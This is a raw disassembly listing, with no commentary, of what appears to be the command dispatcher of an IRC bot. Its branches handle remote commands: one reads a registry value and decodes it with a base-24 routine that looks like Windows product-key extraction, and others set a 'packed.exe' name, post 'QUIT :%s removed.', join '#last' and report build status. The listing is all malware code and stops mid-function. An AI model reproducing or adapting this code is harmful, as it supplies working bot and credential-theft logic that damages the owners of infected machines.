call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 3
jle short loc_40ABFE
push offset dword_419EC0
mov eax, [ebp+var_418]
lea eax, [ebp+eax+var_59B]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40ABFE
mov eax, [ebp+var_418]
and [ebp+eax+var_59B], 0
lea eax, [ebp+var_598]
push eax
call sub_4078A0
pop ecx
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
loc_40ABFE: ; CODE XREF: sub_40A9CF+1E1�j
; sub_40A9CF+1FF�j
mov eax, [ebp+var_418]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_418]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AC1F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC1F: ; CODE XREF: sub_40A9CF+249�j
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF29
pop ecx
pop ecx
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF59
pop ecx
pop ecx
mov [ebp+var_418], eax
push [ebp+var_418]
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_598]
push eax
call sub_40EB4E
add esp, 0Ch
lea eax, [ebp+var_718]
push eax
push offset dword_419E9C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AC84: ; CODE XREF: sub_40A9CF+1A7�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40A9CF+19A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AD84
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_71C], eax
mov eax, [ebp+var_71C]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_71C]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AD0C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD0C: ; CODE XREF: sub_40A9CF+336�j
lea eax, [ebp+var_8A0]
push eax
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_720]
and [ebp+eax+var_8A0], 0
lea eax, [ebp+var_8A0]
push eax
push offset dword_419E70
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AD7F: ; CODE XREF: sub_40A9CF+2DA�j
; sub_40A9CF+2EC�j ...
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: sub_40A9CF+2CD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E60
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADB2
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406643
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40A9CF+3C8�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADD9
lea eax, [ebp+var_1A4]
push eax
call sub_4064BF
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40A9CF+3F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E48
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B0B6
and [ebp+var_9F8], 0
mov [ebp+var_A1C], 0C8h
push 0Ch
pop ecx
mov esi, offset dword_419E14
lea edi, [ebp+var_9D8]
rep movsd
movsb
push 5
pop ecx
mov esi, offset dword_419DFC
lea edi, [ebp+var_8B8]
rep movsd
movsb
lea eax, [ebp+var_9D8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_9F8]
push eax
push 20019h
push 0
lea eax, [ebp+var_9D8]
push eax
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_40AE7D
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AE78
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AE78: ; CODE XREF: sub_40A9CF+49B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AE7D: ; CODE XREF: sub_40A9CF+485�j
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_8B8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_A1C]
push eax
lea eax, [ebp+var_9A4]
push eax
push 0
push 0
lea eax, [ebp+var_8B8]
push eax
push [ebp+var_9F8]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jz short loc_40AEE7
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AEE2
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AEE2: ; CODE XREF: sub_40A9CF+505�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AEE7: ; CODE XREF: sub_40A9CF+4EF�j
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
push 7
pop ecx
mov esi, offset dword_419DDC
lea edi, [ebp+var_A18]
rep movsd
movsb
lea eax, [ebp+var_A18]
push eax
call sub_4105FB
pop ecx
and [ebp+var_9DB], 0
mov [ebp+var_8DC], 18h
jmp short loc_40AF3E
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40A9CF+60B�j
mov eax, [ebp+var_8DC]
dec eax
mov [ebp+var_8DC], eax
loc_40AF3E: ; CODE XREF: sub_40A9CF+560�j
cmp [ebp+var_8DC], 0
jl loc_40AFDF
and [ebp+var_A20], 0
mov [ebp+var_A24], 0Eh
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9CF+5EF�j
mov eax, [ebp+var_A24]
dec eax
mov [ebp+var_A24], eax
loc_40AF6B: ; CODE XREF: sub_40A9CF+58D�j
cmp [ebp+var_A24], 0
jl short loc_40AFC0
mov eax, [ebp+var_A20]
shl eax, 8
mov ecx, [ebp+var_A24]
movzx ecx, [ebp+ecx+var_970]
add eax, ecx
mov [ebp+var_A20], eax
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov ecx, [ebp+var_A24]
mov [ebp+ecx+var_970], al
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov [ebp+var_A20], edx
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AFC0: ; CODE XREF: sub_40A9CF+5A3�j
mov eax, [ebp+var_8DC]
mov ecx, [ebp+var_A20]
mov cl, [ebp+ecx+var_A18]
mov [ebp+eax+var_9F4], cl
jmp loc_40AF31
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: sub_40A9CF+576�j
lea eax, [ebp+var_A18]
push eax
call sub_4105AD
pop ecx
and [ebp+var_8BB], 0
mov [ebp+var_8C1], 2Dh
mov al, [ebp+var_8C1]
mov [ebp+var_8C7], al
mov al, [ebp+var_8C7]
mov [ebp+var_8CD], al
mov al, [ebp+var_8CD]
mov [ebp+var_8D3], al
push 5
lea eax, [ebp+var_9F4]
push eax
lea eax, [ebp+var_8D8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EF]
push eax
lea eax, [ebp+var_8D2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EA]
push eax
lea eax, [ebp+var_8CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E5]
push eax
lea eax, [ebp+var_8C6]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E0]
push eax
lea eax, [ebp+var_8C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8D8]
push eax
push offset aS ; "%s"
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B0B6: ; CODE XREF: sub_40A9CF+41D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DCC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B11C
mov [ebp+var_8], 1
movsx eax, [ebp+var_19]
test eax, eax
jz short loc_40B0E6
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0E6: ; CODE XREF: sub_40A9CF+706�j
movsx eax, [ebp+var_B]
test eax, eax
jz short loc_40B0FD
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0FD: ; CODE XREF: sub_40A9CF+71D�j
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
loc_40B117: ; CODE XREF: sub_40A9CF+715�j
; sub_40A9CF+72C�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B11C: ; CODE XREF: sub_40A9CF+6FA�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DBC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B143
lea eax, [ebp+var_1A4]
push eax
call sub_414EB0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B143: ; CODE XREF: sub_40A9CF+760�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DB0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B247
push 8
pop ecx
mov esi, offset dword_419D8C
lea edi, [ebp+var_A5C]
rep movsd
movsb
mov esi, offset dword_419D84
lea edi, [ebp+var_A38]
movsd
movsw
movsx eax, [ebp+var_A38]
mov ecx, off_41DA68
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_A30], eax
cmp [ebp+var_A30], 0
jz short loc_40B1AD
mov [ebp+var_63E4], offset dword_419D78
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1AD: ; CODE XREF: sub_40A9CF+7D0�j
mov [ebp+var_63E4], offset dword_419D68
loc_40B1B7: ; CODE XREF: sub_40A9CF+7DC�j
mov eax, [ebp+var_63E4]
mov [ebp+var_A28], eax
cmp [ebp+var_A30], 0
jz short loc_40B1D8
mov [ebp+var_63E8], offset aThisBuildIsFul ; "This build is fully functional"
jmp short loc_40B1E2
; ---------------------------------------------------------------------------
loc_40B1D8: ; CODE XREF: sub_40A9CF+7FB�j
mov [ebp+var_63E8], offset aThisBuildIsBro ; "This build is broken and will not funct"...
loc_40B1E2: ; CODE XREF: sub_40A9CF+807�j
mov eax, [ebp+var_63E8]
mov [ebp+var_A2C], eax
lea eax, [ebp+var_A5C]
push eax
call sub_4105FB
pop ecx
push [ebp+var_A2C]
push [ebp+var_A28]
mov eax, dword_41EC30
and eax, 0FFFFh
push eax
movsx eax, byte ptr dword_41DA48
and eax, 0FFh
push eax
lea eax, [ebp+var_A5C]
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
lea eax, [ebp+var_A5C]
push eax
call sub_4105AD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B247: ; CODE XREF: sub_40A9CF+787�j
mov eax, [ebp+var_1A8]
sub eax, dword_419D08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B28E
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_405E45
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B28E: ; CODE XREF: sub_40A9CF+88B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B2C5
mov eax, [ebp+arg_18]
add eax, 4
push eax
mov eax, [ebp+arg_14]
add eax, 4
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_4167DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B2C5: ; CODE XREF: sub_40A9CF+8D2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CF0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B2EF
mov eax, [ebp+var_1A8]
sub eax, dword_419CE4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B300
loc_40B2EF: ; CODE XREF: sub_40A9CF+909�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D74D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40A9CF+91E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CD4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B335
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403260
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B335: ; CODE XREF: sub_40A9CF+944�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CC8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B36A
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40260D
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B36A: ; CODE XREF: sub_40A9CF+979�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3A5
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406509
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3A5: ; CODE XREF: sub_40A9CF+9AE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CA8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3DA
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_41665C
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3DA: ; CODE XREF: sub_40A9CF+9E9�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C98
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B426
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B3FD
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_40A9CF+A27�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000002h
call sub_401000
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B426: ; CODE XREF: sub_40A9CF+A1E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B44C
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_401146
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B44C: ; CODE XREF: sub_40A9CF+A6A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B47D
push 0
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B47D: ; CODE XREF: sub_40A9CF+A90�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C70
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4AE
push 1
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40A9CF+AC1�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C64
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4D5
lea eax, [ebp+var_1A4]
push eax
call sub_409BF1
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4D5: ; CODE XREF: sub_40A9CF+AF2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C5C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B508
push offset dword_41EF48
push offset dword_419C4C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_40A9CF+B19�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C40
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B536
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413FE7
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_40A9CF+B4C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C34
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C28
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5A7
loc_40B575: ; CODE XREF: sub_40A9CF+B7A�j
; sub_40A9CF+B8F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413AB0
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5A7: ; CODE XREF: sub_40A9CF+BA4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5CE
lea eax, [ebp+var_1A4]
push eax
call sub_41417D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40A9CF+BEB�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B631
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz short loc_40B61B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_41673F
pop ecx
test eax, eax
jnz short loc_40B601
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B601: ; CODE XREF: sub_40A9CF+C2B�j
push 104h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset aPacked_exe_0 ; "packed.exe"
call sub_407A56
add esp, 0Ch
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B61B: ; CODE XREF: sub_40A9CF+C1B�j
push offset aPacked_exe ; "packed.exe"
push offset aPacked_exe_0 ; "packed.exe"
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B62C: ; CODE XREF: sub_40A9CF+C4A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B631: ; CODE XREF: sub_40A9CF+C12�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B678
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_414600
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B678: ; CODE XREF: sub_40A9CF+C75�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BE0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B791
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B69F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B69F: ; CODE XREF: sub_40A9CF+CC9�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
shl eax, 1
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A68], eax
cmp [ebp+var_5A68], 0
jnz short loc_40B6C8
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B6C8: ; CODE XREF: sub_40A9CF+CF2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_5A68]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40EB4E
add esp, 0Ch
push [ebp+var_5A68]
push offset dword_419BC4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A68]
call sub_416B4C ; free
pop ecx
push 1000h
lea eax, [ebp+var_1A60]
push eax
call sub_4104A3
pop ecx
pop ecx
call sub_416B64 ; clock
mov [ebp+var_A60], eax
and [ebp+var_1A64], 0
jmp short loc_40B743
; ---------------------------------------------------------------------------
loc_40B736: ; CODE XREF: sub_40A9CF+D9B�j
mov eax, [ebp+var_1A64]
inc eax
mov [ebp+var_1A64], eax
loc_40B743: ; CODE XREF: sub_40A9CF+D65�j
cmp [ebp+var_1A64], 186A0h
jge short loc_40B76C
push 1000h
lea eax, [ebp+var_5A64]
push eax
lea eax, [ebp+var_1A60]
push eax
call sub_40EB4E
add esp, 0Ch
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40A9CF+D7E�j
call sub_416B64 ; clock
sub eax, [ebp+var_A60]
push eax
push offset aItTookMeUms_ ; "It took me %ums."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B791: ; CODE XREF: sub_40A9CF+CBC�j
mov eax, [ebp+var_1A8]
sub eax, dword_419BA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B823
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B7B4
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7B4: ; CODE XREF: sub_40A9CF+DDE�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_5A6C], eax
cmp [ebp+var_5A6C], 0
jnz short loc_40B7DB
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B7DB: ; CODE XREF: sub_40A9CF+E05�j
push [ebp+var_5A6C]
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40E9C9
pop ecx
pop ecx
mov ecx, [ebp+var_5A6C]
and byte ptr [ecx+eax], 0
push [ebp+var_5A6C]
push offset dword_419B88
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5A6C]
call sub_416B4C ; free
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B823: ; CODE XREF: sub_40A9CF+DD5�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B78
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B873
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40B85C
push offset dword_41EF48
push offset dword_419B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp short loc_40B86E
; ---------------------------------------------------------------------------
loc_40B85C: ; CODE XREF: sub_40A9CF+E70�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_41EF48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40B86E: ; CODE XREF: sub_40A9CF+E8B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B873: ; CODE XREF: sub_40A9CF+E67�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B58
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B899
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4097A7
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B899: ; CODE XREF: sub_40A9CF+EB7�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B4C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8C7
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403FE5
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8C7: ; CODE XREF: sub_40A9CF+EDD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B3C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B8ED
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_4098F3
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B8ED: ; CODE XREF: sub_40A9CF+F0B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B30
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B91B
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406722
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B91B: ; CODE XREF: sub_40A9CF+F31�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B20
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B949
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_412F07
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B949: ; CODE XREF: sub_40A9CF+F5F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B14
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B98A
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A1A7
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B98A: ; CODE XREF: sub_40A9CF+F8D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419B08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9BF
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40A50E
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9BF: ; CODE XREF: sub_40A9CF+FCE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B9F5
push offset aPacked_exe ; "packed.exe"
push offset aQuitSRemoved_ ; "QUIT :%s removed."
call sub_40D6CB
pop ecx
pop ecx
push 36EE80h
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B9F5: ; CODE XREF: sub_40A9CF+1003�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ADC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BA79
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA18
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA18: ; CODE XREF: sub_40A9CF+1042�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset aLast ; "#last"
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BA41
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63EC], eax
jmp short loc_40BA4B
; ---------------------------------------------------------------------------
loc_40BA41: ; CODE XREF: sub_40A9CF+1062�j
mov [ebp+var_63EC], offset byte_41DE30
loc_40BA4B: ; CODE XREF: sub_40A9CF+1070�j
push [ebp+var_63EC]
